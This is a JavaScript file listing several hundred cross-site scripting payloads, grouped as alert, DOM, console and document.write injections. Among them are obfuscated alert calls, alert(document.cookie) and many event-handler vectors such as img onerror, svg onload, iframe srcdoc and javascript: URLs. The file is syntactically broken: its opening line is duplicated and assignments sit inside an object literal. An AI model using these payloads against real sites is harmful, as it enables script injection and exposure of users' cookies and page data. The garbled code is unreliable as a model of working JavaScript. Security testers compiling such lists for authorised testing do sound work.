const payloads = {
const payloads = {
  alert: [
    'alert("XSS Test")',
    'al'+'ert("Obfuscated 1")',
    'window["ale"+"rt"]("Obfuscated 2")',
    'alert(document.domain)',
    'alert(window.location.href)',
    'prompt("Enter your name")',
    'prompt("Obfuscated Prompt","default")',
    'confirm("Are you sure?")',
    'confirm("Obfuscated Confirm")',
    'setTimeout("alert(\'Delayed Alert 1\')",1000)',
    'setTimeout("al" + "ert(\'Delayed Alert 2\')",500)',
    'Function("alert(\'Dynamic Function 1\')")()',
    'new Function("al" + "ert(\'Dynamic Function 2\')")()',
    'window["al"+"ert"]("Obfuscated Window")',
    'window.top["ale"+"rt"]("Top Window Alert")',
    'alert(navigator.userAgent)',
    'alert(location.hash)',
    'prompt(location.search)',
    'confirm(document.title)',
    'alert(screen.width + "x" + screen.height)',
    'alert(document.cookie)',
    'alert(document.body.childNodes.length)',
    'alert(document.body.tagName)',
    'alert(window.name)',
    'alert(document.characterSet)',
    'prompt("Test Prompt 1")',
    'prompt("Test Prompt 2")',
    'confirm("Test Confirm 1")',
    'confirm("Test Confirm 2")',
    'alert(String.fromCharCode(88,83,83))',  // XSS
    'alert(eval("1+1"))',
    'alert("XSS "+new Date().getFullYear())',
    'prompt("Obfuscated "+("Prompt"))',
    'confirm("Obfus"+"cated Confirm")',
    'alert(document.forms.length)',
    'alert(document.links.length)',
    'alert(document.images.length)',
    'alert(document.scripts.length)',
    'alert(document.title.length)',
    'alert(document.body.clientHeight)',
    'alert(document.body.clientWidth)',
    'alert(navigator.platform)',
    'alert(navigator.language)',
    'prompt("Enter something","default value")',
    'confirm("Do you like XSS?")',
    'alert(escape("<script>alert(1)</script>"))',
    'alert(unescape("%3Cscript%3Ealert(1)%3C/script%3E"))',
    'alert(btoa("XSS Example"))',
    'alert(atob("WFNTIEV4YW1wbGU="))',
    'alert(Math.random())',
    'alert(Math.floor(Math.random()*100))',
    'alert(Date.now())',
    'prompt(Date())',
    'confirm(Date().toString())',
    'alert(window.innerHeight)',
    'alert(window.innerWidth)',
    'alert(screen.availHeight)',
    'alert(screen.availWidth)',
    'alert(document.URL)',
    'alert(document.referrer)',
    'alert(document.lastModified)',
    'prompt("Your input:",document.title)',
    'confirm("Really exit?")',
    'alert("Test "+(1+2))',
    'alert("Random "+Math.random())',
    'alert("XSS "+document.cookie)',
    'prompt("Enter URL",window.location.href)',
    'confirm("Accept Terms?")',
    'alert("Width: "+window.screen.width)',
    'alert("Height: "+window.screen.height)',
    'alert("XSS"+(2*3))',
    'alert("Eval test: "+eval("3+4"))',
    'prompt("Check Prompt")',
    'confirm("Check Confirm")',
    'alert("Document readyState: "+document.readyState)',
    'alert("Obfuscated: "+("ale"+"rt")(1))',
    'prompt("Obf: "+("pr"+"ompt")("Enter"))',
    'confirm("Obf: "+("co"+"nfirm")("Are you sure?"))',
    'alert(location.protocol)',
    'alert(location.hostname)',
    'alert(location.port)',
    'alert(location.pathname)',
    'alert(location.search)',
    'alert(location.hash)',
    'alert(navigator.cookieEnabled)',
    'alert(navigator.onLine)',
    'prompt("Navigator test")',
    'confirm("Navigator test confirm")',
    'alert(navigator.product)',
    'alert(navigator.vendor)',
    'alert(navigator.appVersion)',
    'alert(navigator.appName)',
    'alert(navigator.userAgent)',
    'alert("XSS"+document.body.scrollHeight)',
    'alert("XSS"+document.body.scrollWidth)',
    'alert("Screen:"+screen.colorDepth)',
    'alert("Screen:"+screen.pixelDepth)',
    'prompt("Screen info")',
    'confirm("Screen info confirm")',
    'alert("Language:"+navigator.language)',
    'alert("Platform:"+navigator.platform)',
    'alert("Cookies?:"+navigator.cookieEnabled)',
    'alert("Online?:"+navigator.onLine)',
    'alert("XSS"+Math.PI)',
    'alert("XSS"+Math.E)',
    'alert("XSS"+Date.parse("2025-01-01"))',
    'prompt("XSS Prompt Test")',
    'confirm("XSS Confirm Test")',
    'alert("Final Payload")'
  ];

 payloads.dom = [
  'document.body.innerHTML="<b>DOM 1</b>"',
  'document["body"].innerHTML="<i>DOM 2</i>"',
  'document.body.style.backgroundColor="red"',
  'document.body.insertAdjacentHTML("beforeend","<p>XSS Injected</p>")',
  'document.title="XSS Title Test"',
  'document.body.appendChild(document.createElement("iframe"))',
  'document.body.style.border="5px solid green"',
  'document.body.innerHTML+=`<div style="color:yellow">Obfuscated DOM</div>`',
  'document.querySelector("body").style.fontSize="25px"',
  'document.getElementsByTagName("body")[0].style.color="lime"',
  'document.createElement("div")',
  'document.body.appendChild(document.createElement("div"))',
  'document.body.firstChild.style.background="blue"',
  'document.body.lastChild.innerHTML="Last child XSS"',
  'document.body.children[0].style.border="3px dashed red"',
  'document.body.childNodes[0].textContent="Child node text"',
  'document.body.insertBefore(document.createElement("span"),document.body.firstChild)',
  'document.body.removeChild(document.body.lastChild)',
  'document.body.replaceChild(document.createElement("p"),document.body.children[0])',
  'document.body.setAttribute("data-test","xss")',
  'document.body.getAttribute("data-test")',
  'document.body.hasAttribute("data-test")',
  'document.body.style.setProperty("color","cyan")',
  'document.body.style.setProperty("background","black")',
  'document.body.style.removeProperty("background")',
  'document.createTextNode("XSS Node")',
  'document.body.appendChild(document.createTextNode("Injected Text"))',
  'document.body.appendChild(document.createComment("XSS Comment"))',
  'document.body.innerHTML+="<b>"+("Obfuscated DOM")+"</b>"',
  'document.body.innerHTML+="<i>"+("Test Inject")+"</i>"',
  'document.body.innerHTML+="<u>"+("Underline DOM")+"</u>"',
  'document.body.style.fontWeight="bold"',
  'document.body.style.fontStyle="italic"',
  'document.body.style.textDecoration="underline"',
  'document.body.style.textAlign="center"',
  'document.body.style.lineHeight="2"',
  'document.body.style.letterSpacing="2px"',
  'document.body.style.wordSpacing="5px"',
  'document.body.style.fontFamily="Courier New"',
  'document.body.style.fontSize="28px"',
  'document.body.style.backgroundImage="linear-gradient(to right, red, yellow)"',
  'document.body.style.boxShadow="0 0 10px red"',
  'document.body.style.borderRadius="10px"',
  'document.body.style.padding="20px"',
  'document.body.style.margin="10px"',
  'document.body.style.opacity="0.8"',
  'document.body.style.visibility="visible"',
  'document.body.style.display="block"',
  'document.body.style.overflow="hidden"',
  'document.body.style.cursor="pointer"',
  'document.body.style.pointerEvents="none"',
  'document.body.style.transition="all 0.5s"',
  'document.body.style.transform="rotate(5deg)"',
  'document.body.style.transform="scale(1.1)"',
  'document.body.style.animation="spin 2s infinite linear"',
  'document.body.innerHTML+=`<marquee>Scrolling DOM</marquee>`',
  'document.body.innerHTML+=`<blink>Blinking DOM</blink>`',
  'document.body.innerHTML+=`<svg onload=alert(1)></svg>`',
  'document.body.innerHTML+=`<img src=x onerror=alert(1)>`',
  'document.body.innerHTML+=`<iframe src="about:blank"></iframe>`',
  'document.body.innerHTML+=`<object data=x onerror=alert(1)></object>`',
  'document.body.innerHTML+=`<details open ontoggle=alert(1)>XSS</details>`',
  'document.body.innerHTML+=`<video autoplay onerror=alert(1)></video>`',
  'document.body.innerHTML+=`<audio autoplay onerror=alert(1)></audio>`',
  'document.body.innerHTML+=`<canvas onmouseover=alert(1)></canvas>`',
  'document.body.innerHTML+=`<form><input onfocus=alert(1)></form>`',
  'document.body.innerHTML+=`<textarea onfocus=alert(1)></textarea>`',
  'document.body.innerHTML+=`<button onclick=alert(1)>Click Me</button>`',
  'document.body.innerHTML+=`<a href="#" onclick=alert(1)>Link</a>`',
  'document.body.innerHTML+=`<span onmouseover=alert(1)>Hover Me</span>`',
  'document.body.innerHTML+=`<div onmouseenter=alert(1)>Enter</div>`',
  'document.body.innerHTML+=`<h1 onmousemove=alert(1)>Move Mouse</h1>`',
  'document.body.innerHTML+=`<p onmouseleave=alert(1)>Leave Mouse</p>`',
  'document.body.innerHTML+=`<section oncontextmenu=alert(1)>Right Click</section>`',
  'document.body.innerHTML+=`<header ondblclick=alert(1)>Double Click</header>`',
  'document.body.innerHTML+=`<footer onmousedown=alert(1)>Mouse Down</footer>`',
  'document.body.innerHTML+=`<nav onmouseup=alert(1)>Mouse Up</nav>`',
  'document.body.innerHTML+=`<article onwheel=alert(1)>Scroll Wheel</article>`',
  'document.body.innerHTML+=`<aside onkeydown=alert(1)>Key Down</aside>`',
  'document.body.innerHTML+=`<figure onkeyup=alert(1)>Key Up</figure>`',
  'document.body.innerHTML+=`<figcaption onkeypress=alert(1)>Key Press</figcaption>`',
  'document.body.innerHTML+=`<mark oninput=alert(1)>Input</mark>`',
  'document.body.innerHTML+=`<time onchange=alert(1)>Change</time>`',
  'document.body.innerHTML+=`<summary onselect=alert(1)>Select</summary>`',
  'document.body.innerHTML+=`<label onclick=alert(1)>Label Click</label>`',
  'document.body.innerHTML+=`<bdi ondblclick=alert(1)>BDI Click</bdi>`',
  'document.body.innerHTML+=`<bdo onmousemove=alert(1)>BDO Move</bdo>`',
  'document.body.innerHTML+=`<cite onmouseenter=alert(1)>Cite Hover</cite>`',
  'document.body.innerHTML+=`<dfn onmouseleave=alert(1)>DFN Leave</dfn>`',
  'document.body.innerHTML+=`<kbd oncontextmenu=alert(1)>Keyboard</kbd>`',
  'document.body.innerHTML+=`<samp onmousedown=alert(1)>Samp Down</samp>`',
  'document.body.innerHTML+=`<var onmouseup=alert(1)>Var Up</var>`',
  'document.body.innerHTML+=`<q onwheel=alert(1)>Quote Scroll</q>`',
  'document.body.innerHTML+=`<small onkeydown=alert(1)>Small KeyDown</small>`',
  'document.body.innerHTML+=`<sub onkeyup=alert(1)>Sub KeyUp</sub>`',
  'document.body.innerHTML+=`<sup onkeypress=alert(1)>Sup KeyPress</sup>`',
  'document.body.innerHTML+=`<time oninput=alert(1)>Time Input</time>`',
  'document.body.innerHTML+=`<u onchange=alert(1)>U Change</u>`',
  'document.body.innerHTML+=`<wbr onselect=alert(1)>WBR Select</wbr>`',
  'document.body.innerHTML+=`<em onclick=alert(1)>Em Click</em>`',
  'document.body.innerHTML+=`<strong ondblclick=alert(1)>Strong Double</strong>`',
  'document.body.innerHTML+=`<i onmouseenter=alert(1)>Italic Hover</i>`',
  'document.body.innerHTML+=`<b onmouseleave=alert(1)>Bold Leave</b>`',
  'document.body.innerHTML+=`<span onmouseover=alert(1)>Span Hover</span>`',
  'document.body.innerHTML+=`<div onfocus=alert(1) tabindex=0>Div Focus</div>`',
  'document.body.innerHTML+=`<p onblur=alert(1) tabindex=0>P Blur</p>`',
  'document.body.innerHTML+=`<input onfocus=alert(1)>Input Focus</input>`',
  'document.body.innerHTML+=`<textarea onblur=alert(1)>Text Blur</textarea>`',
  'document.body.innerHTML+=`<select onchange=alert(1)><option>1</option></select>`',
  'document.body.innerHTML+=`<option onclick=alert(1)>Option Click</option>`',
  'document.body.innerHTML+=`<optgroup onclick=alert(1)><option>1</option></optgroup>`',
  'document.body.innerHTML+=`<button onmousedown=alert(1)>Mouse Down</button>`',
  'document.body.innerHTML+=`<form onsubmit=alert(1)><input type=submit></form>`',
  'document.body.innerHTML+=`<fieldset onclick=alert(1)><legend>Legend</legend></fieldset>`',
  'document.body.innerHTML+=`<legend ondblclick=alert(1)>Legend Double</legend>`',
  'document.body.innerHTML+=`<details onclick=alert(1)><summary>Click</summary></details>`',
  'document.body.innerHTML+=`<summary ondblclick=alert(1)>Summary Double</summary>`'
];

  payloads.console = [
  'console.log("Console Test 1")',
  'con'+'sole.log("Obfuscated 2")',
  'console.warn("Warning Test 3")',
  'console.error("Error Test 4")',
  'console.dir(document.body)',
  'console.table(["XSS", 123, true])',
  'console.count("Counter Test")',
  'console.group("Group Test")',
  'console.groupEnd()',
  'console.assert(false,"Assertion Test")',
  'console.clear()',
  'console.time("Timer1"); console.timeEnd("Timer1")',
  'console.time("Timer2"); console.timeEnd("Timer2")',
  'console.log(document.title)',
  'console.log(document.URL)',
  'console.log(document.referrer)',
  'console.log(window.location.href)',
  'console.log(window.location.hostname)',
  'console.log(window.location.pathname)',
  'console.log(navigator.userAgent)',
  'console.log(navigator.platform)',
  'console.log(navigator.language)',
  'console.log(navigator.cookieEnabled)',
  'console.log(navigator.onLine)',
  'console.log(screen.width + "x" + screen.height)',
  'console.log(document.body.childNodes.length)',
  'console.log(document.body.children.length)',
  'console.log(document.forms.length)',
  'console.log(document.images.length)',
  'console.log(document.links.length)',
  'console.log(document.scripts.length)',
  'console.log(document.styleSheets.length)',
  'console.log(document.characterSet)',
  'console.log(Date.now())',
  'console.log(Math.random())',
  'console.log(Math.floor(Math.random()*100))',
  'console.log(eval("1+1"))',
  'console.log(Function("return 2+2")())',
  'console.log(window.name)',
  'console.log(document.readyState)',
  'console.log(document.hasFocus())',
  'console.log(window.innerHeight)',
  'console.log(window.innerWidth)',
  'console.log(window.outerHeight)',
  'console.log(window.outerWidth)',
  'console.log(document.body.scrollHeight)',
  'console.log(document.body.scrollWidth)',
  'console.log(screen.availHeight)',
  'console.log(screen.availWidth)',
  'console.log(screen.colorDepth)',
  'console.log(screen.pixelDepth)',
  'console.log(btoa("XSS Example"))',
  'console.log(atob("WFNTIEV4YW1wbGU="))',
  'console.log(unescape("%3Cscript%3Ealert(1)%3C/script%3E"))',
  'console.log(escape("<script>alert(1)</script>"))',
  'console.log("Dynamic "+Math.random())',
  'console.log("DOM Elements: "+document.body.children.length)',
  'console.log("Forms: "+document.forms.length)',
  'console.log("Links: "+document.links.length)',
  'console.log("Images: "+document.images.length)',
  'console.log("Scripts: "+document.scripts.length)',
  'console.log("StyleSheets: "+document.styleSheets.length)',
  'console.log("Screen Width: "+screen.width)',
  'console.log("Screen Height: "+screen.height)',
  'console.log("User Agent: "+navigator.userAgent)',
  'console.log("Platform: "+navigator.platform)',
  'console.log("Language: "+navigator.language)',
  'console.log("Cookies Enabled: "+navigator.cookieEnabled)',
  'console.log("Online: "+navigator.onLine)',
  'console.log("Location: "+window.location.href)',
  'console.log("Document URL: "+document.URL)',
  'console.log("Document Referrer: "+document.referrer)',
  'console.log("Document Title: "+document.title)',
  'console.log("Document Charset: "+document.characterSet)',
  'console.log("Random Number: "+Math.random())',
  'console.log("PI: "+Math.PI)',
  'console.log("E: "+Math.E)',
  'console.log("Current Year: "+new Date().getFullYear())',
  'console.log("Current Date: "+new Date())',
  'console.log("Time: "+Date.now())',
  'console.log("Obfuscated "+("con"+"sole").log("XSS"))',
  'console.warn("Obfuscated Warning")',
  'console.error("Obfuscated Error")',
  'console.dir(document.querySelectorAll("div"))',
  'console.table({a:1,b:2,c:3})',
  'console.count("Obf Count")',
  'console.groupCollapsed("Collapsed Group")',
  'console.groupEnd()',
  'console.trace("Trace Test")',
  'console.log("Nested: "+window.document.body.childNodes.length)',
  'console.log("Nested: "+document.body.children.length)',
  'console.log("Eval test: "+eval("2+3"))',
  'console.log("Function test: "+Function("return 5+5")())',
  'console.log("Dynamic alert: "+Function("return 10*10")())',
  'console.log("Final Test 1")',
  'console.log("Final Test 2")',
  'console.log("Final Test 3")',
  'console.log("Final Test 4")',
  'console.log("Final Test 5")',
  'console.log("Obfuscated: "+("co"+"nsole").log("XSS Complete"))',
  'console.log("End of Payloads")'
],
  payloads.html = [
  'document.write("<h1>HTML Inject 1</h1>")',
  'document.write("<h2>HTML Inject 2</h2>")',
  'document.write("<h3>HTML Inject 3</h3>")',
  'document.write("<b>Bold Text</b>")',
  'document.write("<i>Italic Text</i>")',
  'document.write("<u>Underline Text</u>")',
  'document.write("<mark>Marked Text</mark>")',
  'document.write("<small>Small Text</small>")',
  'document.write("<strong>Strong Text</strong>")',
  'document.write("<em>Emphasized Text</em>")',
  'document.write("<p>Paragraph 1</p>")',
  'document.write("<p>Paragraph 2</p>")',
  'document.write("<p>Paragraph 3</p>")',
  'document.write("<div>Div 1</div>")',
  'document.write("<div>Div 2</div>")',
  'document.write("<div>Div 3</div>")',
  'document.write("<span>Span 1</span>")',
  'document.write("<span>Span 2</span>")',
  'document.write("<span>Span 3</span>")',
  'document.write("<a href=\'#\'>Link 1</a>")',
  'document.write("<a href=\'#\'>Link 2</a>")',
  'document.write("<a href=\'#\'>Link 3</a>")',
  'document.write("<img src=x onerror=alert(1)>")',
  'document.write("<svg onload=alert(1)></svg>")',
  'document.write("<iframe src=about:blank></iframe>")',
  'document.write("<video autoplay onerror=alert(1)></video>")',
  'document.write("<audio autoplay onerror=alert(1)></audio>")',
  'document.write("<canvas onmouseover=alert(1)></canvas>")',
  'document.write("<form><input onfocus=alert(1)></form>")',
  'document.write("<textarea onfocus=alert(1)></textarea>")',
  'document.write("<button onclick=alert(1)>Click Me</button>")',
  'document.write("<details open ontoggle=alert(1)>XSS</details>")',
  'document.write("<summary onclick=alert(1)>Summary Click</summary>")',
  'document.write("<marquee>Scrolling Text</marquee>")',
  'document.write("<blink>Blinking Text</blink>")',
  'document.write("<object data=x onerror=alert(1)></object>")',
  'document.write("<embed src=x onerror=alert(1)>")',
  'document.write("<link rel=stylesheet href=x onerror=alert(1)>")',
  'document.write("<style>@import url(x);</style>")',
  'document.write("<iframe srcdoc=\'<script>alert(1)</script>\'></iframe>")',
  'document.write("<img src=x onerror=al"+"ert(1)>")',
  'document.write("<svg/onload=al"+"ert(1)></svg>")',
  'document.write("<iframe src=javascript:alert(1)></iframe>")',
  'document.write("<input value=\'XSS\' onfocus=alert(1)></input>")',
  'document.write("<select onchange=alert(1)><option>1</option></select>")',
  'document.write("<option onclick=alert(1)>Option</option>")',
  'document.write("<optgroup onclick=alert(1)><option>1</option></optgroup>")',
  'document.write("<fieldset onclick=alert(1)><legend>Legend</legend></fieldset>")',
  'document.write("<legend ondblclick=alert(1)>Double Click</legend>")',
  'document.write("<header ondblclick=alert(1)>Header</header>")',
  'document.write("<footer ondblclick=alert(1)>Footer</footer>")',
  'document.write("<nav onclick=alert(1)>Nav</nav>")',
  'document.write("<section onmouseover=alert(1)>Section</section>")',
  'document.write("<article onmouseleave=alert(1)>Article</article>")',
  'document.write("<aside onmouseenter=alert(1)>Aside</aside>")',
  'document.write("<figure onmousemove=alert(1)>Figure</figure>")',
  'document.write("<figcaption onclick=alert(1)>Caption</figcaption>")',
  'document.write("<label onclick=alert(1)>Label</label>")',
  'document.write("<bdo onfocus=alert(1)>BDO Focus</bdo>")',
  'document.write("<bdi onclick=alert(1)>BDI Click</bdi>")',
  'document.write("<cite onclick=alert(1)>Cite</cite>")',
  'document.write("<dfn ondblclick=alert(1)>DFN</dfn>")',
  'document.write("<kbd onkeyup=alert(1)>KBD</kbd>")',
  'document.write("<samp onclick=alert(1)>SAMP</samp>")',
  'document.write("<var onclick=alert(1)>VAR</var>")',
  'document.write("<q onmouseover=alert(1)>Quote</q>")',
  'document.write("<u onclick=alert(1)>Underline</u>")',
  'document.write("<em onclick=alert(1)>Emphasized</em>")',
  'document.write("<strong onclick=alert(1)>Strong</strong>")',
  'document.write("<i onclick=alert(1)>Italic</i>")',
  'document.write("<b onclick=alert(1)>Bold</b>")',
  'document.write("<span onfocus=alert(1) tabindex=0>Focus Span</span>")',
  'document.write("<div onblur=alert(1) tabindex=0>Blur Div</div>")',
  'document.write("<input type=text onfocus=alert(1) value=\'XSS\'>")',
  'document.write("<textarea onblur=alert(1)>Text</textarea>")',
  'document.write("<select onfocus=alert(1)><option>1</option></select>")',
  'document.write("<option onfocus=alert(1)>Option</option>")',
  'document.write("<optgroup onfocus=alert(1)><option>1</option></optgroup>")',
  'document.write("<button onfocus=alert(1)>Focus Button</button>")',
  'document.write("<form onsubmit=alert(1)><input type=submit></form>")',
  'document.write("<details ontoggle=alert(1)><summary>Toggle</summary></details>")',
  'document.write("<summary onfocus=alert(1)>Summary Focus</summary>")',
  'document.write("<iframe srcdoc=\'<script>alert(1)</script>\'></iframe>")',
  'document.write("<img src=x onerror=al"+"ert(1)>")',
  'document.write("<svg/onload=al"+"ert(1)></svg>")',
  'document.write("<iframe src=javascript:alert(1)></iframe>")',
  'document.write("<object data=x onerror=alert(1)></object>")',
  'document.write("<embed src=x onerror=alert(1)>")',
  'document.write("<link rel=stylesheet href=x onerror=alert(1)>")',
  'document.write("<style>@import url(x);</style>")',
  'document.write("<marquee>Scrolling Text</marquee>")',
  'document.write("<blink>Blinking Text</blink>")',
  'document.write("<p>Final HTML Payload</p>")',
  'document.write("<h1>End of HTML Injection</h1>")'
]
};
